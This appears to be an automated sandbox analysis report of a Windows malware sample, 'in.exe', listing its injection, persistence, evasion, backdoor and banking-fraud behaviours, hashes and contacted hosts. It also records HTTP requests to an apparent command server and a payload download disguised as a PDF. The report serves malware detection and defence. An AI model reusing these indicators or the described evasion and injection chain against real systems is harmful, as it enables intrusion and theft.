Loading ...

Analysis Report

Overview

General Information

Analysis ID:57308
Start time:13:01:19
Start date:19/02/2015
Overall analysis duration:0h 4m 29s
Report type:full
Sample file name:in.exe
Cookbook file name:default.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
HCA enabled:true
HCA success:
  • true, ratio: 99%
  • Number of executed functions: 64
  • Number of non-executed functions: 117
Warnings:
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


DDOS:

barindex
Contains functionality to access network services in a loop (often DDOS functionality)Show sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EF11C5 WSAStartup,GetLastError,WSACreateEvent,shutdown,closesocket,Sleep,WSASocketW,inet_addr,htons,WSAConnect,Sleep,WSAConnect,WSASend,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,WSARecv,WSAGetLastError,GetTickCount,GetTickCount,GetTickCount,shutdown,closesocket,WSACloseEvent,CloseHandle,6_2_00EF11C5

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EF9B51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,GetLastError,CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_00EF9B51

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exeWindow created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Checks if browser processes are runningShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: StrStrIW,StrStrIW,StrStrIW,StrStrIW, chrome.exe6_2_00EFD99B
Source: C:\WINDOWS\system32\svchost.exeCode function: StrStrIW,StrStrIW,StrStrIW,StrStrIW, firefox.exe6_2_00EFD99B
Source: C:\WINDOWS\system32\svchost.exeCode function: StrStrIW,StrStrIW,StrStrIW,StrStrIW, iexplore.exe6_2_00EFD99B

Networking:

barindex
Urls found in memory or binary dataShow sources
Source: svchost.exeString found in binary or memory: http://icanhazip.com
Source: PTnbUd10.exe.drString found in binary or memory: http://schemas.microsoft.com/smi/2005/windowssettings
Contains functionality to download additional files from the internetShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EFA86A select,WSAGetLastError,recvfrom,6_2_00EFA86A
Downloads filesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1 Accept: text/*, application/* User-Agent: Mazilla/5.0 Host: checkip.dyndns.org Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /1902uk11/377142/0/51-SP:/0/ELLBEGLBEKBEI HTTP/1.1 User-Agent: Mazilla/5.0 Host: 31.43.236.251:14033 Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /mandoc/gb_eula.pdf HTTP/1.1 Accept: text/*, application/* User-Agent: Mazilla/5.0 Host: soundsofnote.com Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /1902uk11/377142/41/7/4/ HTTP/1.1 User-Agent: Mazilla/5.0 Host: 31.43.236.251:14033 Cache-Control: no-cache
Downloads files with wrong headers with respect to MIME Content-TypeShow sources
Source: httpBad PDF prefix: HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 105 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 38 2e 31 33 38 2e 31 37 2e 31 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 188.138.17.15</body></html>
Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Thu, 19 Feb 2015 12:01:57 GMT Server: Apache Last-Modified: Thu, 19 Feb 2015 10:19:49 GMT Accept-Ranges: bytes Content-Length: 407410 Content-Type: application/pdf Data Raw: ff 38 30 69 0d 04 96 7a 23 c5 7c 3c 1a c6 ef 0a 0e c5 d9 09 0f c5 5f 46 f0 e5 eb d5 ea 23 6f 82 9f 47 bc f1 73 48 ee c6 5e 4e ed 30 5f ca 1c 78 1c c6 6d 6e 9a 80 53 6e 99 b8 57 69 7b c7 aa 3e 14 3a 38 0a 04 c5 ab b5 11 3b 63 c0 d3 a3 96 72 43 b1 87 b5 5c 29 20 f6 91 90 6f ff fb c7 a8 ee 97 c7 28 c6 18 b2 bc 7e 97 c7 cd 86 1b ec 54 6b 08 af aa 56 f1 c2 ab 3e dd 56 af 2f 23 c5 68 b5 f3 4e e9 02 26 15 22 6b ce 4e e9 16 ae 80 47 b5 62 f1 22 73 d9 4e e9 6e a3 80 5f 54 2a ad ab 1e 2c c5 54 4b d9 3a de ce d1 56 a3 2f 2f c5 2e fe 45 d4 c1 3f 59 c5 8b 3e 32 3a de ca 63 3a 38 36 25 c5 ab b7 70 21 c1 3a 5e c5 bb 3e 37 ad ab 2e 38 c5 54 4b dd 3a 38 36 2b c5 ab b5 46 21 20 4b c0 4e fe d6 32 72 e1 38 6f 44 69 c6 3f c5 ab b5 0a d1 21 38 c9 c2 ed 79 0b b0 5c 67 12 46 52 3f 31 cf 20 73 b1 4e e9 32 6d 0d 40 33 cc 87 a7 6c cb 07 83 b5 0
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.10:1031 -> 31.43.236.251:14033
Source: global trafficTCP traffic: 192.168.1.10:45112 -> 107.23.150.92:3478
Source: global trafficTCP traffic: 192.168.1.10:45112 -> 173.194.78.127:19302
Source: global trafficTCP traffic: 192.168.1.10:45112 -> 77.72.169.154:3478
Source: global trafficTCP traffic: 192.168.1.10:45112 -> 77.72.174.165:3478
May check the online ip address of the machineShow sources
Source: in.exeString found in binary or memory: checkip.dyndns.org
Source: svchost.exeString found in binary or memory: http://icanhazip.com
Source: unknownDNS query: name: checkip.dyndns.org
Uses STUN server to do NAT traversialShow sources
Source: unknownDNS query: name: stun.ekiga.net
Source: unknownDNS query: name: stun.internetcalls.com
Source: unknownDNS query: name: stun.l.google.com
Source: unknownDNS query: name: stun.stunprotocol.org
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 1031 -> 14033
Source: unknownNetwork traffic detected: HTTP traffic on port 1033 -> 14033
Uses the I2P (Invisible Internet Project) to hide its network activitiesShow sources
Source: svchost.exeString found in binary or memory: I2P_EVENT
Source: svchost.exeString found in binary or memory: I2P_NODESTAT

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeCode function: 4_2_004031D0 EntryPoint,HeapCreate,lstrcpy,StartServiceCtrlDispatcherW,ExitProcess,4_2_004031D0

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EFA78C htons,socket,bind,WSAGetLastError,closesocket,WSASetLastError,6_2_00EFA78C
Opens a port and listens for incoming connection (possibly a backdoor)Show sources
Source: C:\WINDOWS\system32\svchost.exeSocket bind: port: 45112
Contains VNC / remote desktop functionality (version string found)Show sources
Source: svchost.exeString found in binary or memory: vnc32
Contains strings which may be related to BOT commandsShow sources
Source: svchost.exeString found in binary or memory: ==General==
Source: svchost.exeString found in binary or memory: ==Programs==
Source: svchost.exeString found in binary or memory: ==Users==
Source: svchost.exeString found in binary or memory: cannot get config

Persistence and Installation Behavior:

barindex
Creates license or readme fileShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
Drops PE filesShow sources
Source: C:\in.exeFile created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeExecutable created and started: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeFile created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Source: C:\WINDOWS\system32\svchost.exeFile created: C:\WINDOWS\system32\config\systemprofile\Application Data\nwuvbe82n0.dll

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F2E5E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_018F2E5E
PE file contains sections with non-standard namesShow sources
Source: initial sampleStatic PE information: section name: .yhgq

System Summary:

barindex
Executable creates window controls seldom found in malwareShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeWindow found: window name: RICHEDIT
Uses Rich Edit ControlsShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeFile opened: C:\WINDOWS\system32\Riched32.dll
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F20DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,3_2_018F20DF
Contains functionality to enum processes or threadsShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F225A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,OpenProcess,CloseHandle,Process32Next,3_2_018F225A
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F1E3A FindResourceA,SizeofResource,LoadResource,LockResource,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,DeleteFileA,CreateThread,CloseHandle,CreateProcessA,Sleep,3_2_018F1E3A
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeCode function: 4_2_004031D0 EntryPoint,HeapCreate,lstrcpy,StartServiceCtrlDispatcherW,ExitProcess,4_2_004031D0
Creates temporary filesShow sources
Source: C:\in.exeFile created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AYAX2DA5.tmp
Reads ini filesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeFile read: C:\WINDOWS\win.ini
Spawns processesShow sources
Source: unknownProcess created: C:\in.exe
Source: unknownProcess created: C:\in.exe
Source: unknownProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Source: unknownProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Source: unknownProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Source: unknownProcess created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Source: C:\in.exeProcess created: C:\in.exe C:\in.exe
Source: C:\in.exeProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Contains functionality to call native functionsShow sources
Source: C:\in.exeCode function: 0_2_00402AB5 GetCommandLineW,CreateProcessW,NtGetContextThread,NtUnmapViewOfSection,0_2_00402AB5
Contains functionality to delete servicesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeCode function: 4_2_004023A0 OpenSCManagerW,DeleteFileW,CreateServiceW,RtlGetLastWin32Error,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_004023A0
Contains functionality to launch a process as a different userShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EF573E lstrlenW,CreateEnvironmentBlock,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,6_2_00EF573E
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: ShellExecuteW, C:\windows\system32\shutdown.exe6_2_00EF5A25
Creates files inside the system directoryShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeFile created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Creates mutexesShow sources
Source: C:\WINDOWS\system32\svchost.exeMutant created: \BaseNamedObjects\Global\zx5fwtw4ep
Reads the hosts fileShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile read: C:\WINDOWS\system32\drivers\etc\hosts
Source: C:\WINDOWS\system32\svchost.exeFile read: C:\WINDOWS\system32\drivers\etc\hosts
Tries to load missing DLLsShow sources
Source: C:\WINDOWS\system32\svchost.exeSection loaded: bcrypt.dll

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to create a new security descriptorShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F16F7 AllocateAndInitializeSid,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_018F16F7
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F1BC9 GetModuleHandleA,GetModuleFileNameW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CreateThread,CloseHandle,ShellExecuteExW,ExitProcess,3_2_018F1BC9
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)Show sources
Source: C:\WINDOWS\system32\svchost.exeCode function: CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,Process32NextW,CloseHandle,CloseHandle, explorer.exe6_2_00EF5617
Injects a PE file into a foreign processesShow sources
Source: C:\in.exeMemory written: C:\in.exe base: 400000 value starts with: 4D5A
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeMemory written: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another processShow sources
Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exeSection loaded: unknown target pid: 832 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\in.exeThread register set: target process: 156
Queues an APC in another process (thread injection)Show sources
Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exeThread APC queued: target process: 832

Anti Debugging and Sandbox Evasion:

barindex
Contains functionality to query system informationShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA,3_2_018F13C8
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API callsShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F2E5E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_018F2E5E
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F4000 GetProcessHeap,HeapAlloc,GetComputerNameA,GetVersionExA,wsprintfA,3_2_018F4000
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\in.exeMemory protected: page read and write and page guard
Enables debug privilegesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess token adjusted: Debug
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe TID: 196Thread sleep time: -922337203685477ms >= -60000ms
Source: C:\WINDOWS\system32\svchost.exe TID: 240Thread sleep count: 241 > 100
Source: C:\WINDOWS\system32\svchost.exe TID: 240Thread sleep time: -60250ms >= -60000ms
Source: C:\WINDOWS\system32\svchost.exe TID: 868Thread sleep time: -922337203685477ms >= -60000ms

Virtual Machine Detection:

barindex
Contains functionality to query system informationShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA,3_2_018F13C8
Queries a list of all running processesShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeThread delayed: delay time: -922337203685477

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to install a shim (may redirect execution)Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F35D9 "%%windir%%\system32\sdbinst.exe" /q /u "%s"3_2_018F35D9
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F3521 "%%windir%%\system32\sdbinst.exe" /q "%s"3_2_018F3521
Disables application error messsages (SetErrorMode)Show sources
Source: C:\in.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\in.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\in.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeProcess information set: NOOPENFILEERRORBOX
Deletes itself after installationShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeFile deleted: c:\in.exe
Icon mismatch, uses an Icon from a different legit application in order to fool usersShow sources
Source: initial sampleIcon embedded in PE file: icon matches a legit application icon: 6ccecccccc8ca4d0
Source: initial sampleIcon embedded in PE file: icon matches a legit application icon: 6ccecccccc8ca4d0
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 1031 -> 14033
Source: unknownNetwork traffic detected: HTTP traffic on port 1033 -> 14033

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)Show sources
Source: Homeupd.exeBinary or memory string: mbam.exe
Source: Homeupd.exeBinary or memory string: avgnt.exe
Source: Homeupd.exeBinary or memory string: avgui.exe

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EF6B9A CreateNamedPipeW,ConnectNamedPipe,GetLastError,CreateThread,CloseHandle,6_2_00EF6B9A
Contains functionality to query local / system timeShow sources
Source: C:\WINDOWS\system32\svchost.exeCode function: 6_2_00EF549D GetLocalTime,6_2_00EF549D
Contains functionality to query the account / user nameShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F1812 GetUserNameA,wsprintfA,3_2_018F1812
Contains functionality to query windows versionShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exeCode function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA,3_2_018F13C8
Queries the cryptographic machine GUIDShow sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara Overview

No Yara matches

Startup

  • system is xp
  • in.exe (PID: 524 MD5: 08CEA5CA7A6C1BCEEBE4ADC7FD9404D1)
    • in.exe (PID: 156 MD5: 08CEA5CA7A6C1BCEEBE4ADC7FD9404D1)
  • cleanup

Created / dropped Files

File PathType and Hashes
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AYAX2DA5.tmp
  • Type: data
  • MD5: 3D87234A3445B5C67AE47ACC46D3C3D8
  • SHA: 500BB68136659B23F72964F708B2331EFF6AF3CB
  • SHA-256: F0719B4767795FEDB4BC4AD963ED476612FB547FC4871144F90E0B68263879C1
  • SHA-512: 7E056D3BA2EA3E95CC8521A5FB21DFC70A03EBF91A09661BB6266E6BED72A792AC9A6386A414CB53E51C491F15C615E5883EB03C486F0096CFF5297B19D0569D
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  • MD5: 08CEA5CA7A6C1BCEEBE4ADC7FD9404D1
  • SHA: B94AF9934C1F8124B38B92AFD248340F06D51E7F
  • SHA-256: FE8B5D3603DA5A11A7A8CC11CF63ADC2EEF35A41BFE8161F390E94EE98DC63E3
  • SHA-512: 7751E88B68687BE25F5218253550F766B3C5ECDDB5884DFB3733BD9D159B40A20B51E706F5FB100F7DEE55312BF385808F1D84D39509F4B7F06DB6A619CE7CB1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  • MD5: 7C9DB45DD4BDCD25DC21D7D91D552E32
  • SHA: 16F30A7DACF0CD9D2FB69A1FFCE9B13E97F02FE1
  • SHA-256: 753CA1BFC5752B595959706D3777A85171DA7582A21C1EE452E7F3E90CDE81F4
  • SHA-512: 481DA5A627FE3CC6893100F5C8BEB27060ADB8C38E7FC40B34A1FBACD303DAAF1CAA571EECE1F57F8CF83953A7ADD8FCF0F7A7238DB3C856C6FB507A7588A45E
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
  • Type: data
  • MD5: 3D87234A3445B5C67AE47ACC46D3C3D8
  • SHA: 500BB68136659B23F72964F708B2331EFF6AF3CB
  • SHA-256: F0719B4767795FEDB4BC4AD963ED476612FB547FC4871144F90E0B68263879C1
  • SHA-512: 7E056D3BA2EA3E95CC8521A5FB21DFC70A03EBF91A09661BB6266E6BED72A792AC9A6386A414CB53E51C491F15C615E5883EB03C486F0096CFF5297B19D0569D
C:\WINDOWS\system32\config\systemprofile\Application Data\nwuvbe82n0.dll
  • Type: data
  • MD5: 928D380F5BC1A5D3ACBC554B0821DFF4
  • SHA: C14DE7AF70E8B97E1A342B5F71621F36EDD7B59E
  • SHA-256: 0BA602212BFA493B31FFBA655ACA452F85CE7AA2699686D6E9FE4F7F1389842F
  • SHA-512: FA57567CFA98F2CEC57BCA1466884B0DD518DB619733F6E7ABA153265A57DE61FDD84E60B82E6357B4E2E8D07625A4996EC358867B149216EFFCBCAED73EF8CF
C:\WINDOWS\yDDWPXuvXqBkqjT.exe
  • Type: MS Windows icon resource - 3 icons, 16x16, 16-colors
  • MD5: C731F24E4C8E9A203C6BDC48F88C68C0
  • SHA: 0606D317C77257A4105C2F926E6A484675CE0FEA
  • SHA-256: 11CA620B7D4E9BF0759F342248D42F85FC3E32AF1D510184929EF1FC75D18DFD
  • SHA-512: 9130BAEB5A656D589CF53F8F7DD13317C6A92582CE358399B8CDFC5C41DA0105602E2BFBF756B7E2B81B30806EBF7473930306CDB42544543E9B1FF937D8286B
\ROUTER
  • Type: GLS_BINARY_LSB_FIRST
  • MD5: ACFF5E69A991261463DD14F3269754D5
  • SHA: D596EA27149DD633791A1C917D106C102A903ED4
  • SHA-256: 036DFA15A86003031BA6E8E053BF6BCAF961D6FD925B11FBCC7E1A6F703750CF
  • SHA-512: AB7971E42D6193056ECC4F2779268FD9B5FE967A1774387F3EB2C9469521A3F5B2CFC09B9539A21C62607F76791B9EEFA6751DEDA1315B26047DBC9EFCCB5AF2

Contacted Domains/Contacted IPs

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
soundsofnote.com216.194.168.39unknowntrueunknownunknown
stun.internetcalls.com77.72.169.154unknowntrueunknownunknown
stun.l.google.com173.194.78.127unknowntrueunknownunknown
google.com173.194.65.101unknowntrueunknownunknown
stun.stunprotocol.org107.23.150.92unknowntrueunknownunknown
stun.ekiga.net77.72.174.165unknowntrueunknownunknown
checkip.dyndns.org91.198.22.70unknowntrueunknownunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryPingableOpen Ports
31.43.236.251Ukraineunknownunknown
107.23.150.92United Statesunknownunknown
173.194.65.101United Statesunknownunknown
173.194.78.127United Statesunknownunknown
77.72.169.154Netherlandsunknownunknown
195.186.1.121Switzerlandunknownunknown
216.194.168.39United Statesunknownunknown
77.72.174.165Netherlandsunknownunknown
91.198.22.70United Kingdomunknownunknown

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID:
  • Win64 Executable (generic) (27655/43) 72.25%
  • Win32 Executable (generic) (4510/7) 11.78%
  • Win16/32 Executable Delphi generic (2074/23) 5.42%
  • Generic Win/DOS Executable (2004/3) 5.24%
  • DOS Executable Generic (2002/1) 5.23%
File name:in.exe
File size:26624
MD5:08cea5ca7a6c1bceebe4adc7fd9404d1
SHA1:b94af9934c1f8124b38b92afd248340f06d51e7f
